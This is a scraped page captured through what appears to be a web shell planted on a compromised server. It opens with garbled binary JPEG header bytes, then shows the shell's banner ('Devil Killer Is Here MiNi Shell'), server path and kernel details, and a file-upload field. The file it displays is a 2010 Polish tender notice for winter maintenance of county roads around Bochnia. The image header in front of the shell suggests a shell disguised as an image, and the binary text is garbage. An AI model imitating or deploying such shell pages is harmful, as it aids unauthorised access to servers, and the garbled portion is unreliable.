JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100714/208494-N-2010.html

<p class="kh_header"><b>Nowy Wiśnicz: Zimowe utrzymanie dróg powiatowych leżących na terenie Powiatu Bocheńskiego 5 Zadań:</b><br>
<b>Numer ogłoszenia: 208494 - 2010; data zamieszczenia: 14.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Bochni z siedzibą w Nowym Wiśniczu , ul. Limanowska 11, 32-720 Nowy Wiśnicz, woj. małopolskie, tel. 014 6128206, faks 014 6108481.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych leżących na terenie Powiatu Bocheńskiego 5 Zadań:.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. Przedmiot zamówienia
3.1.  Przedmiotem zamówienia jest: świadczenie usług w okresie od dnia 01 października do dnia 31 grudnia 2010 roku, związanych z zimowym utrzymaniem dróg - 5 zadań tj.: 
3.1.1 likwidacja skutków zimy, żywiołu śnieżnego i skutków obniżonej temperatury poprzez przejęcie na siebie obowiązku utrzymania przejezdności dróg, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego wywołanego czynnikami atmosferycznymi,
3.1.2 prowadzenie akcji zimowej w dzień i w nocy, w dni robocze i święta, w różnych warunkach atmosferycznych - opady śniegu, marznącego deszczu, zawieje, zamiecie śnieżne, niskie temperatury,
3.1.3 utrzymywanie w pełnej gotowości technicznej i eksploatacyjnej środków transportowych i sprzętowych wraz z osprzętem przewidzianym do zwalczania skutków zimy,
3.1.4 posiadanie dostępu do materiałów uszorstniających i soli,
3.1.5 pełnienie dyżurów.

3.2. Zakres zamówienia obejmuje: Wykonywanie usług komunalnych w okresie od dnia 01 października do dnia 31 grudnia 2010 roku, polegających na zimowym utrzymaniu dróg powiatowych leżących na terenie powiatu bocheńskiego wg podziału na rejony opisane  w załączniku nr 7 i 8.
Wykonywanie usługi zimowego utrzymania polega w szczególności na:
-   odśnieżaniu dróg 						      			
-   posypywaniu dróg mieszanką (materiał uszorstniającą 75% + sól 25%).    	
 - wywozie śniegu z ulic leżących w ciągach dróg powiatowych w razie potrzeby  

3.3 Utrzymanie zimowe dróg. Zasady realizacji zamówienia:.
3.3.1 Utrzymanie zimowe dróg powiatowych na terenie Powiatu Bocheńskiego obejmuje wykonywanie prac porządkowych i usuwanie skutków zimy, zmierzających do zwiększenia bezpieczeństwa ruchu w tym: 
 -  odśnieżanie całej szerokości drogi, zatok autobusowych i utrzymanie stałej przejezdności
- usuwanie śliskości zimowej przy zastosowaniu odpowiednich (właściwych) środków chemicznych i środków powodujących szorstkość nawierzchni,
 -  odśnieżanie jezdni w technologii mechaniczno-ręcznej, tj. uzupełnienie odśnieżania mechanicznego ręcznym odgarnięciem pokrywy śnieżnej w miejscach niedostępnych dla pługów,
- posypanie piaskiem lub innym właściwym środkiem powodującym szorstkość, nawierzchni po odgarnięciu śniegu i lodu (na wniosek Zamawiającego drogi mogą być posypywane żużlem),
- posypanie i likwidowanie śliskości na odcinkach dróg ze zbyt dużym spadkiem podłużnym drogi - ze szczególnym uwzględnieniem skrzyżowań, przez ręczne posypywanie środkami chemicznymi i środkami powodującymi szorstkość (w przypadku utrudnionego podjazdu posypywarek).
            
3.3.2 Inne obowiązki Wykonawcy w ramach zimowego utrzymania dróg: 
- dysponowanie dostateczną do bieżącego wykonywania zabiegów liczbą sprzętu specjalistycznego (pługopiaskarki itp.) w tym, w przypadku wystąpienia wzmożonych warunków zimowych lub warunków uznanych za klęskę żywiołowa uzupełnienie dodatkowego sprzętu o: pługi odśnieżne, ładowarki, sprzęt holowniczy, itp.,
- zakup żużla i soli drogowej w ilościach niezbędnych do prowadzenia akcji zimowej oraz przygotowanie pojazdów i sprzętu (konserwacja, remonty) przed jej rozpoczęciem,
- zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania zgłoszeń od wytypowanego pracownika Zamawiającegoi przekazywania informacji o sytuacji na drogach,
- prowadzenie  rejestru dobowego przebiegu usługi w raportach dziennych wg wzoru stanowiącego załącznik nr 9 SIWZ oraz przekazywanie raportu do Zamawiającego  faksem na nr 014 610 84 81  do godz. 9.00. Raport będzie podlegał zatwierdzeniu przez Zamawiającego,
- przyjmowanie zgłoszeń od: Zamawiającego, pogotowia ratunkowego, Policji i innych uprawnionych służb publicznych,
- organizowanie wewnętrznej gotowości pracy w taki sposób, aby w ciągu jednej godziny po otrzymaniu zgłoszenia od wytypowanego przedstawiciela PZD lub w czasie zgodnym z wytycznymi Standardu zimowego utrzymania, przystąpić do wykonywania czynności związanych z zimowym utrzymaniem dróg, 
- przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstawanie zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg o największym znaczeniu komunikacyjnym i na głównych skrzyżowaniach Miasta, 
- odśnieżanie jezdni ulic należy prowadzić na całej szerokości z zachowaniem odległości nie większej niż 30 cm od strefy przykrawężnikowej. Należy zwracać szczególną uwagę na dokładne odśnieżanie skrzyżowania ulic i dróg w odległości 10 m od przejścia dla pieszych oraz spadków podłużnych i poprzecznych,
- przy zgarnianiu śniegu z jezdni nie należy zasypywać przejść, przystanków autobusowych oraz skrzyżowań,
- podejmowanie następujących działań w sytuacji wynikających np. z intensywnych opadów śniegu lub zalegającego błota pośniegowego:.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dotyczącego posiadania wiedzy i doświadczenia w szczególności: wykonania co najmniej dwóch zadań o charakterze porównywalnym jak w niniejszym postępowaniu tj. z zakresu zimowego utrzymania dróg - w formie załączonego do oferty oświadczenia z podaniem nazwy i danych zleceniodawcy, zakresu zamówienia, terminów wykonania oraz wartości, potwierdzonego stosownym dokumentem uprzedniego zleceniodawcy o należytym wykonaniu zamówienia, każda o cenie nie mniejszej niż 50.000 złotych brutto, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dokonana zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o 1. oświadczenie wykonawcy, 2. wykaz usług, 3. dokument potwierdzający,że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dotyczącego dysponowania odpowiednim potencjałem technicznym do wykonania zadania. Wykonawca musi mieć do dyspozycji niezbędne środki transportu, sprzęt  i urządzenia  do realizacji poszczególnych zadań:
- zadanie nr 1 - rozsypywacz rolniczy  - szt. 1,  
- pług z nośnikiem  - szt. 1,  
- zadanie nr 2 - piaskarka z pługiem lemieszowym z nośnikiem  -  szt. 2,
- zadanie nr 3 - piaskarka z pługiem lemieszowym z nośnikiem  -  szt. 2,
 - pług z nośnikiem  - szt. 1,
- zadanie nr 4 - piaskarka z pługiem lemieszowym z nośnikiem  -  szt.1,
- zadanie nr 5 - piaskarka szt. 1,  pług lemieszowy z nośnikiem  -  szt.1.
zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o 1. oświadczenie wykonawcy, 2. druk potencjał techniczny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dotyczącego osobami zdolnymi do wykonania zamówienia. Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel, a zwłaszcza osoby tj.:
- dyżurny  - osoba (osoby) wyznaczona do porozumiewania się z Zamawiającym, znająca tematykę zimowego utrzymania dróg, mogąca podejmować decyzje związane  z zimowym utrzymaniem dróg do której należałoby dysponowanie sprzętem i transportem, przekazywanie telefonicznie informacji o stanie dróg do Zamawiającego  i przyjmowanie zgłoszeń od: pogotowia ratunkowego, Policji i Zamawiającego, 
- kierowcy nośnika (operator) pod piaskarkę, który winien znać tematykę zimowego utrzymania dróg.
zostanie zgodnie z formułą spełnia-nie spełnia w oparciu o 1. oświadczenie wykonawcy, 2. druk potencjał kadrowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia w szczególności: osobami, które będzie uczestniczyć w wykonywaniu zamówienia, posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi - kierownika budowy posiadającego uprawnienia budowlane do kierowania robotami w specjalności drogowej, oraz wpis na listę członków właściwej izby samorządu zawodowego potwierdzony ważnym zaświadczeniem wydanym przez tę izbę dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o: 1. oświadczenie wykonawcy, 2. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, 3. oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony Formularz Oferta - stanowiący załącznik nr 1 do SIWZ.
2) Oryginał lub kopię pełnomocnictwa albo inny dokument (np. kopia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej) dla osoby/osób podpisującej/ podpisujących ofertę, upoważniający do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych.
3) W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.malopolska.pl/bip/bochenski<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Bochni ul. Limanowska 11, 32-720 Nowy Wiśnicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2010 godzina 10:00, miejsce: Powiatowy Zarząd Dróg w Bochni ul. Limanowska 11, 32-720 Nowy Wiśnicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rejon I    - Gmina  Drwinia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2. Zakres zamówienia obejmuje: Wykonywanie usług komunalnych w okresie od dnia 01 października do dnia 31 grudnia 2010 roku, polegających na zimowym utrzymaniu dróg powiatowych leżących na terenie powiatu bocheńskiego wg podziału na rejony opisane  w załączniku nr 7 i 8.
Wykonywanie usługi zimowego utrzymania polega w szczególności na:
-   odśnieżaniu dróg 						      			
-   posypywaniu dróg mieszanką (materiał uszorstniającą 75% + sól 25%).    	
 - wywozie śniegu z ulic leżących w ciągach dróg powiatowych w razie potrzeby  

3.3 Utrzymanie zimowe dróg. Zasady realizacji zamówienia:.
3.3.1 Utrzymanie zimowe dróg powiatowych na terenie Powiatu Bocheńskiego obejmuje wykonywanie prac porządkowych i usuwanie skutków zimy, zmierzających do zwiększenia bezpieczeństwa ruchu w tym: 
 -  odśnieżanie całej szerokości drogi, zatok autobusowych i utrzymanie stałej przejezdności
- usuwanie śliskości zimowej przy zastosowaniu odpowiednich (właściwych) środków chemicznych i środków powodujących szorstkość nawierzchni,
 -  odśnieżanie jezdni w technologii mechaniczno-ręcznej, tj. uzupełnienie odśnieżania mechanicznego ręcznym odgarnięciem pokrywy śnieżnej w miejscach niedostępnych dla pługów,
- posypanie piaskiem lub innym właściwym środkiem powodującym szorstkość, nawierzchni po odgarnięciu śniegu i lodu (na wniosek Zamawiającego drogi mogą być posypywane żużlem),
- posypanie i likwidowanie śliskości na odcinkach dróg ze zbyt dużym spadkiem podłużnym drogi - ze szczególnym uwzględnieniem skrzyżowań, przez ręczne posypywanie środkami chemicznymi i środkami powodującymi szorstkość  (w przypadku utrudnionego podjazdu posypywarek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rejon II   - Gminy  Bochnia, Rzezawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2.Zakres zamówienia obejmuje: Wykonywanie usług komunalnych w okresie od dnia 01 października do dnia 31 grudnia 2010 roku, polegających na zimowym utrzymaniu dróg powiatowych leżących na terenie powiatu bocheńskiego wg podziału na rejony opisane  w załączniku nr 7 i 8.
Wykonywanie usługi zimowego utrzymania polega w szczególności na:
-   odśnieżaniu dróg 						      			
-   posypywaniu dróg mieszanką (materiał uszorstniającą 75% + sól 25%).    	
 - wywozie śniegu z ulic leżących w ciągach dróg powiatowych w razie potrzeby  

3.3 Utrzymanie zimowe dróg. Zasady realizacji zamówienia:.
3.3.1 Utrzymanie zimowe dróg powiatowych na terenie Powiatu Bocheńskiego obejmuje wykonywanie prac porządkowych i usuwanie skutków zimy, zmierzających do zwiększenia bezpieczeństwa ruchu w tym: 
 -  odśnieżanie całej szerokości drogi, zatok autobusowych i utrzymanie stałej przejezdności
- usuwanie śliskości zimowej przy zastosowaniu odpowiednich (właściwych) środków chemicznych i środków powodujących szorstkość nawierzchni,
 -  odśnieżanie jezdni w technologii mechaniczno-ręcznej, tj. uzupełnienie odśnieżania mechanicznego ręcznym odgarnięciem pokrywy śnieżnej w miejscach niedostępnych dla pługów,
- posypanie piaskiem lub innym właściwym środkiem powodującym szorstkość, nawierzchni po odgarnięciu śniegu i lodu (na wniosek Zamawiającego drogi mogą być posypywane żużlem),
- posypanie i likwidowanie śliskości na odcinkach dróg ze zbyt dużym spadkiem podłużnym drogi - ze szczególnym uwzględnieniem skrzyżowań, przez ręczne posypywanie środkami chemicznymi i środkami powodującymi szorstkość  (w przypadku utrudnionego podjazdu posypywarek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rejon III  - Gminy  Nowy Wiśnicz, Lipnica Murowana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2.Zakres zamówienia obejmuje: Wykonywanie usług komunalnych w okresie od dnia 01 października do dnia 31 grudnia 2010 roku, polegających na zimowym utrzymaniu dróg powiatowych leżących na terenie powiatu bocheńskiego wg podziału na rejony opisane  w załączniku nr 7 i 8.
Wykonywanie usługi zimowego utrzymania polega w szczególności na:
-   odśnieżaniu dróg 						      			
-   posypywaniu dróg mieszanką (materiał uszorstniającą 75% + sól 25%).    	
 - wywozie śniegu z ulic leżących w ciągach dróg powiatowych w razie potrzeby  

3.3 Utrzymanie zimowe dróg. Zasady realizacji zamówienia:.
3.3.1 Utrzymanie zimowe dróg powiatowych na terenie Powiatu Bocheńskiego obejmuje wykonywanie prac porządkowych i usuwanie skutków zimy, zmierzających do zwiększenia bezpieczeństwa ruchu w tym: 
 -  odśnieżanie całej szerokości drogi, zatok autobusowych i utrzymanie stałej przejezdności
- usuwanie śliskości zimowej przy zastosowaniu odpowiednich (właściwych) środków chemicznych i środków powodujących szorstkość nawierzchni,
 -  odśnieżanie jezdni w technologii mechaniczno-ręcznej, tj. uzupełnienie odśnieżania mechanicznego ręcznym odgarnięciem pokrywy śnieżnej w miejscach niedostępnych dla pługów,
- posypanie piaskiem lub innym właściwym środkiem powodującym szorstkość, nawierzchni po odgarnięciu śniegu i lodu (na wniosek Zamawiającego drogi mogą być posypywane żużlem),
- posypanie i likwidowanie śliskości na odcinkach dróg ze zbyt dużym spadkiem podłużnym drogi - ze szczególnym uwzględnieniem skrzyżowań, przez ręczne posypywanie środkami chemicznymi i środkami powodującymi szorstkość  (w przypadku utrudnionego podjazdu posypywarek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rejon IV  - Gminy  Trzciana, Żegocina.</p>
